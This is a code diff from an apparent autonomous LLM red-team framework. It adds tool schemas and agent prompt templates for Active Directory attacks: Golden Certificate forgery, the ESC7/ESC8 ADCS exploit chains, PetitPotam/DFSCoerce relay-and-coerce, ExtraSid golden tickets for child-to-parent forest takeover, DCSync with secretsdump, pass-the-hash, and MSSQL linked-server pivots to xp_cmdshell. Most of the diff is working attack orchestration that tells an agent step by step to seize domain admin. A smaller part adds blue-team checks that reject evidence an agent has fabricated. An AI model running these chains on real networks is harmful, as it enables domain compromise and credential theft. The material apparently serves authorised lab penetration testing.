Can add yourself as a \ + CA officer (ManageCA right required), issue a pending certificate request, or \ + back up the CA's private key + certificate (requires SYSTEM/local admin on the \ + CA host — produces a PFX usable for offline certificate forgery via certipy_forge)." + .into(), + input_schema: json!({ + "type": "object", + "properties": { + "domain": { + "type": "string", + "description": "Target domain (e.g. contoso.local)" + }, + "username": { + "type": "string", + "description": "Username for authentication (must have ManageCA rights)" + }, + "password": { + "type": "string", + "description": "Password for authentication" + }, + "dc_ip": { + "type": "string", + "description": "Domain controller IP address" + }, + "ca": { + "type": "string", + "description": "Certificate Authority name (e.g. 'CONTOSO-CA')" + }, + "add_officer": { + "type": "boolean", + "description": "Add yourself as a CA officer. Requires ManageCA rights." + }, + "issue_request": { + "type": "integer", + "description": "Issue (approve) a pending certificate request by its request ID." + }, + "backup": { + "type": "boolean", + "description": "Back up the CA private key + certificate to a PFX. Requires SYSTEM or local admin on the CA host (use the credential of an account with that access). Output PFX is the input to certipy_forge for offline Golden Certificate forgery." + } + }, + "required": ["domain", "username", "password", "dc_ip", "ca"] + }), + }, + ToolDefinition { + name: "certipy_forge".into(), + description: "Forge a certificate offline using a CA's backed-up private key (Golden \ + Certificate). Use after certipy_ca with backup=true to produce a PFX for any UPN \ + in the CA's domain — bypasses normal enrollment, no DC interaction. The forged \ + PFX feeds certipy_auth to obtain the target user's NT hash via PKINIT." 
+ .into(), + input_schema: json!({ + "type": "object", + "properties": { + "ca_pfx": { + "type": "string", + "description": "Path to the CA's backed-up PFX file (produced by certipy_ca with backup=true)." + }, + "upn": { + "type": "string", + "description": "User Principal Name to forge the certificate for (e.g. 'administrator@contoso.local'). Used as the certificate subject for PKINIT authentication." + }, + "subject": { + "type": "string", + "description": "Optional certificate subject (Distinguished Name). Defaults to a sensible value derived from the UPN." + }, + "template": { + "type": "string", + "description": "Optional certificate template name to mimic. Defaults to a generic client-auth template." + }, + "out": { + "type": "string", + "description": "Output filename for the forged PFX. Auto-generated if omitted (forged__.pfx)." + } + }, + "required": ["ca_pfx", "upn"] + }), + }, + ToolDefinition { + name: "certipy_retrieve".into(), + description: "Retrieve a previously issued certificate from the CA by its request ID. \ + Used after certipy_ca -issue-request approves a pending request." + .into(), + input_schema: json!({ + "type": "object", + "properties": { + "domain": { + "type": "string", + "description": "Target domain (e.g. 
contoso.local)" + }, + "username": { + "type": "string", + "description": "Username for authentication" + }, + "password": { + "type": "string", + "description": "Password for authentication" + }, + "dc_ip": { + "type": "string", + "description": "Domain controller IP address" + }, + "ca": { + "type": "string", + "description": "Certificate Authority name" + }, + "request_id": { + "type": "integer", + "description": "The certificate request ID to retrieve" + }, + "target": { + "type": "string", + "description": "CA server IP or hostname for RPC enrollment" + } + }, + "required": ["domain", "username", "password", "dc_ip", "ca", "request_id"] + }), + }, + ToolDefinition { + name: "certipy_relay".into(), + description: "Start a Certipy relay listener for ADCS certificate enrollment via \ + relay attacks. Supports HTTP relay (ESC8) and RPC relay (ESC11). \ + For ESC8: target=http://ca-host. For ESC11: target=rpc://ca-host." + .into(), + input_schema: json!({ + "type": "object", + "properties": { + "target": { + "type": "string", + "description": "Relay target URL. Use 'http://' for ESC8 (HTTP web enrollment relay) or 'rpc://' for ESC11 (RPC certificate enrollment relay)." + }, + "ca": { + "type": "string", + "description": "Certificate Authority name (e.g. 'CONTOSO-CA')" + }, + "template": { + "type": "string", + "description": "Certificate template to request during relay. Optional — defaults to Machine for HTTP or uses the CA's default." + } + }, + "required": ["target", "ca"] + }), + }, + ToolDefinition { + name: "certipy_esc7_full_chain".into(), + description: "Execute the full ESC7 exploit chain: add yourself as CA officer \ + (ManageCA abuse), request a SubCA certificate (gets denied), issue the pending \ + request, retrieve the certificate, and authenticate to obtain NT hashes. \ + Requires the user to have ManageCA rights on the target CA." 
+ .into(), + input_schema: json!({ + "type": "object", + "properties": { + "domain": { + "type": "string", + "description": "Target domain (e.g. contoso.local)" + }, + "username": { + "type": "string", + "description": "Username for authentication (must have ManageCA rights)" + }, + "password": { + "type": "string", + "description": "Password for authentication" + }, + "dc_ip": { + "type": "string", + "description": "Domain controller IP address" + }, + "ca": { + "type": "string", + "description": "Certificate Authority name (e.g. 'CONTOSO-CA')" + }, + "target": { + "type": "string", + "description": "CA server IP or hostname for certificate enrollment. REQUIRED when the CA is on a different host than the DC." + }, + "upn": { + "type": "string", + "description": "UPN of the user to impersonate. Defaults to 'administrator@'.", + "default": "administrator" + }, + "sid": { + "type": "string", + "description": "SID to embed in the certificate (e.g. domain SID + '-500' for Administrator)" + } + }, + "required": ["domain", "username", "password", "dc_ip", "ca"] + }), + }, ] } diff --git a/ares-llm/src/tool_registry/privesc/tickets.rs b/ares-llm/src/tool_registry/privesc/tickets.rs index 47666a60..ccb6ff4f 100644 --- a/ares-llm/src/tool_registry/privesc/tickets.rs +++ b/ares-llm/src/tool_registry/privesc/tickets.rs @@ -64,10 +64,6 @@ pub fn definitions() -> Vec { "hash": { "type": "string", "description": "NTLM hash for pass-the-hash authentication (e.g. aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0). Use this OR password." 
- }, - "target_domain": { - "type": "string", - "description": "Parent domain FQDN (auto-detected from child if omitted)" } }, "required": ["child_domain", "username"] @@ -92,7 +88,11 @@ pub fn definitions() -> Vec { }, "password": { "type": "string", - "description": "Password for authentication" + "description": "Password for authentication (use this OR hash, must be non-empty)" + }, + "hash": { + "type": "string", + "description": "NTLM hash for pass-the-hash authentication (LM:NT or NT-only). Use this OR password." }, "dc_ip": { "type": "string", @@ -103,7 +103,7 @@ pub fn definitions() -> Vec { "description": "The trusted domain to extract the trust key for (e.g. fabrikam.local)" } }, - "required": ["domain", "username", "password", "dc_ip", "trusted_domain"] + "required": ["domain", "username", "dc_ip", "trusted_domain"] }), }, ToolDefinition { @@ -140,6 +140,14 @@ pub fn definitions() -> Vec { "description": "Username to embed in the ticket. Defaults to Administrator.", "default": "Administrator" }, + "extra_sid": { + "type": "string", + "description": "Extra SID to embed (e.g. '-519' for Enterprise Admins). Use for child-to-parent escalation within the same forest. OMIT for cross-forest trusts — SID filtering blocks RIDs < 1000." + }, + "aes_key": { + "type": "string", + "description": "AES256 trust key (hex, 64 chars). REQUIRED for Windows Server 2016+ target DCs — RC4-only inter-realm tickets are rejected with KDC_ERR_TGT_REVOKED. Extract alongside the NT hash via extract_trust_key (look for ':aes256-cts-hmac-sha1-96:' line)." + }, "duration": { "type": "integer", "description": "Ticket duration in days. 
Defaults to 3650.", diff --git a/ares-llm/src/tool_registry/recon.rs b/ares-llm/src/tool_registry/recon.rs index 3105f70b..e7b1f4cd 100644 --- a/ares-llm/src/tool_registry/recon.rs +++ b/ares-llm/src/tool_registry/recon.rs @@ -117,18 +117,22 @@ pub(super) fn tool_definitions() -> Vec { }, ToolDefinition { name: "ldap_search".into(), - description: "Execute an LDAP search query against a domain controller.".into(), + description: "Execute an LDAP search query against a domain controller. When authenticating with credentials from a different domain (e.g. child domain cred against parent DC), set bind_domain to the credential's domain.".into(), input_schema: json!({ "type": "object", "properties": { "target": {"type": "string", "description": "DC IP or hostname"}, - "domain": {"type": "string"}, + "domain": {"type": "string", "description": "Target domain (used for LDAP base DN)"}, "username": {"type": "string"}, "password": {"type": "string"}, "filter": {"type": "string", "description": "LDAP filter (e.g. '(objectClass=user)')"}, "attributes": { "type": "string", "description": "Comma-separated attributes to retrieve" + }, + "bind_domain": { + "type": "string", + "description": "Domain for LDAP bind DN (user@bind_domain). Use when credential domain differs from target domain (e.g. child-domain cred authenticating to parent DC). If omitted, uses 'domain'." } }, "required": ["target", "domain", "filter"] @@ -136,15 +140,16 @@ pub(super) fn tool_definitions() -> Vec { }, ToolDefinition { name: "rpcclient_command".into(), - description: "Execute an rpcclient command against a target.".into(), + description: "Execute an rpcclient command against a target. Supports pass-the-hash via the 'hash' parameter.".into(), input_schema: json!({ "type": "object", "properties": { "target": {"type": "string"}, - "command": {"type": "string", "description": "rpcclient command (e.g. 'enumdomusers')"}, + "command": {"type": "string", "description": "rpcclient command (e.g. 
'enumdomusers', 'enumdomgroups', 'querygroupmem ')"}, "username": {"type": "string"}, "password": {"type": "string"}, - "domain": {"type": "string"} + "domain": {"type": "string"}, + "hash": {"type": "string", "description": "NTLM hash for pass-the-hash authentication (use instead of password)"} }, "required": ["target", "command"] }), @@ -256,5 +261,24 @@ pub(super) fn tool_definitions() -> Vec { "required": ["target"] }), }, + ToolDefinition { + name: "ldap_acl_enumeration".into(), + description: "Enumerate ACL attack paths by querying nTSecurityDescriptor attributes on AD objects. Identifies dangerous ACEs (GenericAll, WriteDacl, ForceChangePassword, GenericWrite, WriteOwner, Self-Membership) that can be exploited for privilege escalation. Supports pass-the-hash via the 'hash' parameter.".into(), + input_schema: json!({ + "type": "object", + "properties": { + "target": {"type": "string", "description": "DC IP or hostname"}, + "domain": {"type": "string", "description": "Target domain"}, + "username": {"type": "string"}, + "password": {"type": "string"}, + "hash": {"type": "string", "description": "NTLM hash for pass-the-hash (use instead of password)"}, + "bind_domain": { + "type": "string", + "description": "Domain for LDAP bind DN when credential domain differs from target domain" + } + }, + "required": ["target", "domain"] + }), + }, ] } diff --git a/ares-llm/templates/redteam/agents/coercion.md.tera b/ares-llm/templates/redteam/agents/coercion.md.tera index 887c6fbc..8036f9a3 100644 --- a/ares-llm/templates/redteam/agents/coercion.md.tera +++ b/ares-llm/templates/redteam/agents/coercion.md.tera @@ -111,12 +111,40 @@ dfscoerce( ## Relay Attack Coordination -### For ADCS ESC8 -You handle the full ESC8 attack chain: -1. Start `ntlmrelayx_to_adcs(ca_host="ca.contoso.local", attacker_ip="YOUR_IP")` -2. Run `petitpotam(target="dc.contoso.local", listener="YOUR_IP")` to coerce DC -3. DC authenticates to relay, relay requests certificate from CA -4. 
Certificate is saved, use `certipy_auth` (on privesc) to get NTLM hash +### For ADCS ESC8 — USE `relay_and_coerce` +**Preferred:** make ONE deterministic call — do not orchestrate ntlmrelayx + petitpotam manually. The composite tool starts the relay, runs **unauthenticated PetitPotam first** (works on unpatched DCs without any creds), then optionally falls back to **DFSCoerce (MS-DFSNM)**, then to coercer over MS-EFSR/MS-RPRN if creds are supplied. It emits a `certificate_obtained` vulnerability that triggers `certipy_auth` automatically. + +**CRITICAL — source ≠ target.** `coerce_target` MUST be a different host than `ca_host`. Windows NTLM same-machine loopback protection blocks relayed auth when the coerced machine is the relay target. Coerce a DC (or other reachable machine) and relay it to the CA. Coercing the CA back to itself is dead. + +**Default — unauth (try this FIRST, no creds needed):** +``` +relay_and_coerce( + ca_host="ca.contoso.local", # ADCS web enrollment host + coerce_target="dc01.contoso.local", # DIFFERENT host to coerce (not ca_host!) + attacker_ip="YOUR_IP", + template="DomainController" +) +``` + +**With creds (only add if unauth fails or DC is known patched):** +``` +relay_and_coerce( + ca_host="ca.contoso.local", + coerce_target="dc01.contoso.local", # MUST differ from ca_host + attacker_ip="YOUR_IP", + coerce_user="user", # Account to RPC the target machine + coerce_password="...", # OR coerce_hash=":NTHASH" + coerce_domain="user.realm", # User's home realm + template="DomainController" +) +``` +Cross-forest case: `coerce_user` lives in the child realm; `coerce_target` is the parent DC (or another parent-realm machine). The captured cert is for that machine's account — `certipy_auth` will PKINIT into the parent realm and extract the hash. **Try unauth first — most lab DCs are unpatched against PetitPotam.** + +**Fallback (only if `relay_and_coerce` is unavailable):** +1. `ntlmrelayx_to_adcs(ca_host=..., attacker_ip=...)` +2. 
`petitpotam(target=..., listener=...)` or `dfscoerce(...)` +3. Wait for cert capture +4. Manually report cert path so privesc can run `certipy_auth` ### For LDAP Relay ``` @@ -192,7 +220,8 @@ Combine mitm6 with ntlmrelayx to create computer account: |------|----------| | ntlmrelayx_to_smb | Relay to SMB for psexec/secretsdump | | ntlmrelayx_to_ldaps | Relay to LDAPS (RBCD, delegate-access) | -| ntlmrelayx_to_adcs | Relay to ADCS web enrollment (ESC8) | +| ntlmrelayx_to_adcs | Relay to ADCS web enrollment (ESC8) — prefer `relay_and_coerce` | +| relay_and_coerce | **Composite ESC8: starts relay + coerces DC + emits cert vuln in one call** | | ntlmrelayx_multirelay | Multi-target relay with targets file | ## Hash Types Captured diff --git a/ares-llm/templates/redteam/tasks/exploit_adcs_esc.md.tera b/ares-llm/templates/redteam/tasks/exploit_adcs_esc.md.tera index edc46b3c..3eecab13 100644 --- a/ares-llm/templates/redteam/tasks/exploit_adcs_esc.md.tera +++ b/ares-llm/templates/redteam/tasks/exploit_adcs_esc.md.tera @@ -1,22 +1,44 @@ **ADCS {{ vuln_upper }} EXPLOITATION** CA Server: {{ ca_server }} -Template: {{ template }} +{% if ca_name %}CA Name: {{ ca_name }} +{% endif %}Template: {{ template }} Domain: {{ domain }} -Task ID: {{ task_id }} +{% if dc_ip %}DC IP: {{ dc_ip }} +{% endif %}{% if username %}Username: {{ username }} +{% endif %}{% if password %}Password: {{ password }} +{% endif %}{% if admin_sid %}Admin SID: {{ admin_sid }} +{% endif %}Task ID: {{ task_id }} -**STEP BUDGET: ~25 steps max. Work efficiently!** +{% if instructions %}**INSTRUCTIONS:** +{{ instructions }} + +{% endif %}**STEP BUDGET: ~25 steps max. 
Work efficiently!** **HARD LIMITS:** - 'connection refused'/'timed out' -> CA unreachable, STOP immediately - 'web enrollment' error -> HTTP not available, call task_complete(failed) - Max 2 attempts per tool, then report failure +{% if not is_esc8 -%} +**CRITICAL PARAMETERS for certipy_request:** +- `ca` = CA Name ({{ ca_name }}) — the CA identifier +- `target` = CA Server IP ({{ ca_server }}) — RPC enrollment connects here +- `dc_ip` = DC IP ({{ dc_ip }}) — LDAP queries only +- Do NOT confuse `target` (CA server) with `dc_ip` (domain controller) +{% if admin_sid %}- `sid` = {{ admin_sid }} — prevents SID mismatch in certipy_auth +{% endif %} +{% endif -%} + **WORKFLOW:** {% if is_esc8 -%} -1. Start ntlmrelayx targeting the CA's web enrollment -2. Coerce DC/target to authenticate to relay -3. Relay captures cert -> certipy_auth for hash +{% if coerce_target %}Coerce Target (primary): {{ coerce_target }} (must differ from CA Server — Windows loopback blocks same-host relay) +{% endif %}{% if coerce_targets and coerce_targets | length > 1 %}Fallback Coerce Targets (try in order if primary's callback drifts): {{ coerce_targets | join(sep=", ") }} +{% endif %}{% if listener_ip %}Relay Listener: {{ listener_ip }} +{% endif %}1. Start ntlmrelayx targeting the CA's web enrollment{% if listener_ip %} bound to {{ listener_ip }}{% endif %} +2. Coerce {% if coerce_target %}{{ coerce_target }}{% else %}a DC or other target host (NOT the CA){% endif %} to authenticate to the relay +3. If the relay log shows no inbound auth (callback drift) and a credential is available, retry with `coerce_user`/`coerce_password` parameters set so DFSCoerce/Coercer phases can authenticate{% if coerce_targets and coerce_targets | length > 1 %}; if still no callback, retry `relay_and_coerce` against the next host in the fallback list{% endif %} +4. Relay captures cert -> certipy_auth for hash {% else -%} 1. certipy_request to request certificate with alternate UPN 2. 
certipy_auth to get NTLM hash from certificate diff --git a/ares-llm/templates/redteam/tasks/exploit_mssql.md.tera b/ares-llm/templates/redteam/tasks/exploit_mssql.md.tera index 0c6bf068..4ddf9e4b 100644 --- a/ares-llm/templates/redteam/tasks/exploit_mssql.md.tera +++ b/ares-llm/templates/redteam/tasks/exploit_mssql.md.tera @@ -58,6 +58,42 @@ mssql_enum_linked_servers( ) ``` -> Linked servers can pivot across domain/forest trusts! + +**STEP 6: PIVOT CROSS-FOREST (mssql_exec_linked DOUBLE-HOP CAVEAT)** +`mssql_exec_linked` runs `EXEC ('...') AT [link]` which uses the connecting +user's mapped credential — this **fails on cross-forest links** without +Kerberos delegation (the classic double-hop problem). Two source-side +workarounds, in order of preference: + +1. **OPENQUERY via stored login mapping** (`mssql_openquery`) — rides the + linked server's `sp_addlinkedsrvlogin` mapping and bypasses double-hop. + First check the link has `RPC OUT` and a stored credential: + ``` + mssql_command(target='{{ target }}', ..., + command="SELECT s.name, s.is_rpc_out_enabled, l.uses_self_credential, l.remote_name + FROM sys.servers s LEFT JOIN sys.linked_logins l ON s.server_id = l.server_id;") + ``` + Then pivot: + ``` + mssql_openquery(target='{{ target }}', ..., + linked_server='SQL02', + query='SELECT SYSTEM_USER, IS_SRVROLEMEMBER(''sysadmin'')') + ``` + +2. **EXECUTE AS LOGIN locally, then hop** — when current login has + IMPERSONATE on a high-priv login (e.g. `sa`), wrap the hop: + ``` + mssql_exec_linked(target='{{ target }}', ..., + linked_server='SQL02', + impersonate_user='sa', + query='SELECT SYSTEM_USER') + ``` + Same `impersonate_user` parameter works on `mssql_linked_enable_xpcmdshell` + and `mssql_linked_xpcmdshell`. + +If the linked server reports `is_rpc_out_enabled=1` and a non-self stored +login mapping exists, use `mssql_openquery`. Otherwise, enumerate +IMPERSONATE first and chain via `impersonate_user='sa'`. 
{% if creds_section %} {{ creds_section }} {% endif -%} @@ -65,7 +101,8 @@ mssql_enum_linked_servers( - Try EACH credential above - SQL accepts Windows auth - Impersonation check is HIGHEST PRIORITY (fastest path to sysadmin) - If xp_cmdshell gives NETWORK SERVICE, you may need potato attack for SYSTEM -- Linked servers enable cross-domain pivoting +- Linked servers enable cross-domain pivoting — cross-forest links REQUIRE + `mssql_openquery` or `impersonate_user='sa'` (see STEP 6) Report credentials obtained in JSON format: ```json diff --git a/ares-llm/templates/redteam/tasks/exploit_trust.md.tera b/ares-llm/templates/redteam/tasks/exploit_trust.md.tera index c28c8402..bf56e1d5 100644 --- a/ares-llm/templates/redteam/tasks/exploit_trust.md.tera +++ b/ares-llm/templates/redteam/tasks/exploit_trust.md.tera @@ -5,16 +5,102 @@ Target Domain: {{ trusted_domain }} DC IP: {{ dc_ip }} Task ID: {{ task_id }} +{% if is_child_to_parent and has_child_krbtgt -%} +**INTRA-FOREST CHILD→PARENT — ExtraSid via child krbtgt** + +This is a parent-child intra-forest trust. SID filtering does NOT apply, so we +forge a golden ticket signed by the child krbtgt with the parent's Enterprise +Admins SID via `extra_sid`. **Do NOT call extract_trust_key, get_sid, or +create_inter_realm_ticket — those are not needed for this path.** + +**STEP 1: FORGE EXTRASID GOLDEN TICKET** +``` +generate_golden_ticket( + krbtgt_hash='{{ child_krbtgt_hash }}', + domain_sid='{{ source_sid_val }}', + domain='{{ domain }}', + extra_sid='{{ extra_sid_val }}-519' +) +``` +-> Saves `Administrator.ccache` in working directory + +**STEP 2: DCSync THE PARENT DC WITH THE TICKET** +``` +secretsdump_kerberos( + target='{{ target_dc_hostname | default(value="") }}', + username='Administrator', + domain='{{ trusted_domain }}', + ticket_path='Administrator.ccache', + dc_ip='{{ target_dc_hint }}', + target_ip='{{ target_dc_hint }}' +) +``` +-> Success means parent krbtgt hash extracted = full DA on parent. 
+ +**Fallback A — `-just-dc-user krbtgt` if SPN target name validation blocks DRSUAPI:** +``` +secretsdump_kerberos( + target='{{ target_dc_hostname | default(value="") }}', + username='Administrator', + domain='{{ trusted_domain }}', + ticket_path='Administrator.ccache', + dc_ip='{{ target_dc_hint }}', + target_ip='{{ target_dc_hint }}', + just_dc_user='krbtgt' +) +``` + +**Fallback B — VSS shadow-copy if DRSUAPI is fully hardened:** +``` +secretsdump_kerberos( + target='{{ target_dc_hostname | default(value="") }}', + username='Administrator', + domain='{{ trusted_domain }}', + ticket_path='Administrator.ccache', + dc_ip='{{ target_dc_hint }}', + target_ip='{{ target_dc_hint }}', + use_vss=true +) +``` + +**Fallback C — direct PTH secretsdump with parent Administrator hash if known.** +If the parent Administrator NTLM hash has been harvested in a previous step, run: +``` +secretsdump( + target='{{ target_dc_hint }}', + username='Administrator', + domain='{{ trusted_domain }}', + hash='' +) +``` + +Report the parent krbtgt hash as a finding once obtained: +```json +{"hash": {"username": "krbtgt", "hash_value": "...", "hash_type": "NTLM", "domain": "{{ trusted_domain }}"}} +``` + +{% if state_context %} + +## Current Operation State + +{{ state_context }} +{% endif -%} +{% else -%} {% if has_trust_key -%} **TRUST KEY (already extracted):** `{{ trust_key }}` {% else -%} +{% if password or admin_hash -%} **STEP {{ step_extract }}: EXTRACT INTER-REALM TRUST KEY** ``` extract_trust_key( domain='{{ domain }}', username='{{ username }}', +{% if password -%} password='{{ password }}', +{% else -%} + hash='{{ admin_hash }}', +{% endif -%} dc_ip='{{ dc_ip }}', trusted_domain='{{ trusted_domain }}' ) @@ -22,6 +108,12 @@ extract_trust_key( -> Look for: trust account NTLM hash (e.g., {{ trusted_domain_prefix }}$ hash) -> Also extract AES256 key if available (needed for Windows 2016+) +{% else -%} +**STEP {{ step_extract }}: EXTRACT INTER-REALM TRUST KEY — credentials missing** 
+No password or admin_hash available. Source a DA-level credential or hash for +`{{ domain }}` first via DCSync, then retry trust key extraction. + +{% endif -%} {% endif -%} {% if needs_source_sid or needs_target_sid -%} **STEP {{ step_sid }}: RESOLVE DOMAIN SIDs** @@ -31,7 +123,11 @@ Source SID (resolve via source DC): get_sid( domain='{{ domain }}', username='{{ username }}', +{% if password -%} password='{{ password }}', +{% elif admin_hash -%} + hash='{{ admin_hash }}', +{% endif -%} dc_ip='{{ dc_ip }}' ) ``` @@ -61,16 +157,21 @@ create_inter_realm_ticket( extra_sid='{{ extra_sid_val }}-519'{% endif %} ) ``` --> Saves .ccache ticket file for cross-domain auth +-> Saves ticket to `Administrator.ccache` in working directory **STEP {{ step_secretsdump }}: USE TICKET FOR SECRETSDUMP ON TARGET DOMAIN** +{% if target_dc_hostname -%} +Target DC hostname: `{{ target_dc_hostname }}` +Target DC IP: `{{ target_dc_hint }}` +{% endif -%} ``` secretsdump_kerberos( - target='', + target='{{ target_dc_hostname | default(value="") }}', username='Administrator', domain='{{ trusted_domain }}', - ticket_path='', - target_ip='' + ticket_path='Administrator.ccache', + dc_ip='{{ target_dc_hint }}', + target_ip='{{ target_dc_hint }}' ) ``` -> Look for krbtgt hash = DOMAIN ADMIN on target domain! 
@@ -109,23 +210,30 @@ If manual steps above fail, use the automated approach: raise_child( child_domain='{{ domain }}', username='{{ username }}', - password='{{ password }}' + password='{{ password }}', + dc_ip='{{ dc_ip }}', + target_ip='{{ target_dc_hint }}' ) {% elif admin_hash -%} raise_child( child_domain='{{ domain }}', username='{{ username }}', - hash='{{ admin_hash }}' + hash='{{ admin_hash }}', + dc_ip='{{ dc_ip }}', + target_ip='{{ target_dc_hint }}' ) {% else -%} raise_child( child_domain='{{ domain }}', username='{{ username }}', - password='' + password='', + dc_ip='{{ dc_ip }}', + target_ip='{{ target_dc_hint }}' ) {% endif -%} ``` -> Automates: trust key extraction + ExtraSid golden ticket + parent DC secretsdump +-> `dc_ip`/`target_ip` are mandatory when DNS cannot resolve child/parent FQDNs from the operator host. {% endif -%} **CRITICAL NOTES:** @@ -146,3 +254,4 @@ Report any hashes obtained: {{ state_context }} {% endif -%} +{% endif -%} diff --git a/ares-llm/templates/redteam/tasks/recon.md.tera b/ares-llm/templates/redteam/tasks/recon.md.tera index c3f7d589..9a234781 100644 --- a/ares-llm/templates/redteam/tasks/recon.md.tera +++ b/ares-llm/templates/redteam/tasks/recon.md.tera @@ -5,13 +5,29 @@ {% endif -%} {% if credential_username %}**Credential:** {{ credential_username }}@{{ credential_domain }}{% if credential_password %} / Password: {{ credential_password }}{% endif %} {% endif -%} +{% if bind_domain %}**Bind Domain:** {{ bind_domain }} (use bind_domain={{ bind_domain }} in ldap_search when credential domain differs from target domain) +{% endif -%} +{% if technique -%} +**Technique:** {{ technique }} +{% endif -%} {% if techniques -%} **Requested Techniques:** {% for t in techniques -%} - {{ t }} {% endfor -%} -{% else -%} +{% endif -%} +{% if ntlm_hash -%} +**NTLM Hash (for pass-the-hash):** {{ ntlm_hash }}{% if hash_username %} (user: {{ hash_username }}){% endif %} +{% endif -%} + +{% if instructions -%} +## Instructions + 
+**IMPORTANT: Follow these instructions exactly. Do NOT perform generic scanning — execute only the specific technique described below.** + +{{ instructions }} +{% elif not techniques -%} Perform a comprehensive reconnaissance scan of the target. {% endif -%} diff --git a/ares-tools/Cargo.toml b/ares-tools/Cargo.toml index b519596b..9ecbbeff 100644 --- a/ares-tools/Cargo.toml +++ b/ares-tools/Cargo.toml @@ -17,6 +17,7 @@ uuid = { workspace = true } regex = { workspace = true } redis = { workspace = true } tempfile = "3" +base64 = "0.22" [features] default = ["blue"] diff --git a/ares-tools/src/acl.rs b/ares-tools/src/acl.rs index 48c239cd..f3c2a848 100644 --- a/ares-tools/src/acl.rs +++ b/ares-tools/src/acl.rs @@ -167,7 +167,7 @@ pub async fn pywhisker(args: &Value) -> Result { .flag("-p", password) .flag("--target", target_sam) .flag("--action", action) - .flag("-dc-ip", dc_ip) + .flag("--dc-ip", dc_ip) .timeout_secs(120) .execute() .await @@ -837,6 +837,8 @@ mod tests { assert_eq!(action_flag, "--AddComputerTask"); } + // --- mock executor tests: exercise full CommandBuilder code paths --- + use crate::executor::mock; #[tokio::test] diff --git a/ares-tools/src/blue/investigation/write.rs b/ares-tools/src/blue/investigation/write.rs index 7b065f49..35557f66 100644 --- a/ares-tools/src/blue/investigation/write.rs +++ b/ares-tools/src/blue/investigation/write.rs @@ -36,13 +36,24 @@ pub async fn add_evidence(args: &Value) -> Result { ))); } - // Validate evidence against recent query results and adjust confidence - let (query_validated, _source_query_id) = evidence_validator::validate_evidence_value(value); + // Grounding: refuse to write evidence whose value was not seen in any + // recent query result (or is a MITRE technique ID, which auto-validates). + // Without this check, an agent could fabricate an IP/user/hash and have it + // accepted as evidence — confidence-only penalties don't deter that. 
+ let (query_validated, source_query_id) = evidence_validator::validate_evidence_value(value); + if !query_validated { + return Ok(make_error(&format!( + "Evidence rejected: value '{value}' was not found in any recorded query result. \ + Run a Loki/Prometheus query that returns this value first, then add it as evidence. \ + Evidence values must be IOCs grounded in observed data, not asserted by the agent." + ))); + } let raw_confidence = args .get("confidence") .and_then(Value::as_f64) .unwrap_or(0.5); let confidence = evidence_validator::adjust_confidence(raw_confidence, query_validated); + let _ = source_query_id; // Auto-assign pyramid level from evidence type when caller omits it let pyramid_level = optional_str(args, "pyramid_level") @@ -198,7 +209,17 @@ pub async fn add_evidence_batch(args: &Value) -> Result { continue; } + // Grounding: reject items whose value was not seen in any recent + // query result (MITRE technique IDs auto-validate inside + // `validate_evidence_value`). let (query_validated, _) = evidence_validator::validate_evidence_value(value); + if !query_validated { + validation_errors.push(format!( + "item[{i}] {evidence_type}={value}: value not found in any recorded query result \ + (run a query returning this IOC before recording it as evidence)" + )); + continue; + } let raw_confidence = item .get("confidence") .and_then(Value::as_f64) diff --git a/ares-tools/src/coercion.rs b/ares-tools/src/coercion.rs index 1e1e7901..759d30ec 100644 --- a/ares-tools/src/coercion.rs +++ b/ares-tools/src/coercion.rs @@ -4,9 +4,16 @@ //! produced by running the corresponding CLI tool as a subprocess. 
use std::io::Write; +use std::net::TcpListener; +use std::path::{Path, PathBuf}; +use std::process::Stdio; +use std::time::{Duration, Instant}; -use anyhow::Result; +use anyhow::{Context, Result}; +use base64::Engine; use serde_json::Value; +use tokio::process::{Child, Command as TokioCommand}; +use tokio::time::sleep; use crate::args::{optional_bool, optional_str, required_str}; use crate::executor::CommandBuilder; @@ -58,6 +65,7 @@ pub async fn coercer(args: &Value) -> Result { .arg("coerce") .flag("-t", target) .flag("-l", listener) + .arg("--always-continue") .timeout_secs(120); if let Some(u) = username { @@ -89,6 +97,7 @@ pub async fn petitpotam(args: &Value) -> Result { .flag("-t", target) .flag("-l", listener) .args(["--filter-protocol-name", "MS-EFSR"]) + .arg("--always-continue") .timeout_secs(60); if let Some(u) = username { @@ -116,8 +125,8 @@ pub async fn dfscoerce(args: &Value) -> Result { let domain = optional_str(args, "domain"); let mut cmd = CommandBuilder::new("dfscoerce") - .flag("-t", target) - .flag("-l", listener) + .arg(listener) + .arg(target) .timeout_secs(60); if let Some(u) = username { @@ -133,6 +142,25 @@ pub async fn dfscoerce(args: &Value) -> Result { cmd.execute().await } +/// Standalone-relay BUSY response. Standalone `ntlmrelayx_to_*` tools share +/// the host-wide port 445 (and SOCKS 1080) with `relay_and_coerce`; a second +/// invocation while one is already in flight crashes with +/// `OSError [Errno 98] Address already in use`. We acquire the same loopback +/// sentinel the composite path uses and refuse to race when contended. +fn relay_busy_output(tool: &str) -> ToolOutput { + ToolOutput { + stdout: format!( + "RELAY_BIND_BUSY\n{tool}: another relay/coerce invocation is active \ + on this host (loopback port {RELAY_LOCK_PORT} held). Refusing to \ + race for ntlmrelayx port 445; retry after the in-flight relay \ + completes." 
+ ), + stderr: String::new(), + exit_code: Some(0), + success: false, + } +} + /// Relay captured NTLM authentication to LDAPS for delegation abuse. /// /// Required args: `dc_ip` @@ -141,6 +169,11 @@ pub async fn ntlmrelayx_to_ldaps(args: &Value) -> Result { let dc_ip = required_str(args, "dc_ip")?; let delegate_access = optional_bool(args, "delegate_access").unwrap_or(false); + let _lock = match try_acquire_relay_lock() { + Some(l) => l, + None => return Ok(relay_busy_output("ntlmrelayx_to_ldaps")), + }; + let target_url = format!("ldaps://{dc_ip}"); CommandBuilder::new("impacket-ntlmrelayx") @@ -159,6 +192,11 @@ pub async fn ntlmrelayx_to_adcs(args: &Value) -> Result { let ca_host = required_str(args, "ca_host")?; let template = optional_str(args, "template"); + let _lock = match try_acquire_relay_lock() { + Some(l) => l, + None => return Ok(relay_busy_output("ntlmrelayx_to_adcs")), + }; + let target_url = format!("http://{ca_host}/certsrv/certfnsh.asp"); CommandBuilder::new("impacket-ntlmrelayx") @@ -179,15 +217,850 @@ pub async fn ntlmrelayx_to_smb(args: &Value) -> Result { let socks = optional_bool(args, "socks").unwrap_or(false); let interactive = optional_bool(args, "interactive").unwrap_or(false); + let _lock = match try_acquire_relay_lock() { + Some(l) => l, + None => return Ok(relay_busy_output("ntlmrelayx_to_smb")), + }; + CommandBuilder::new("impacket-ntlmrelayx") .flag("-t", target_ip) - 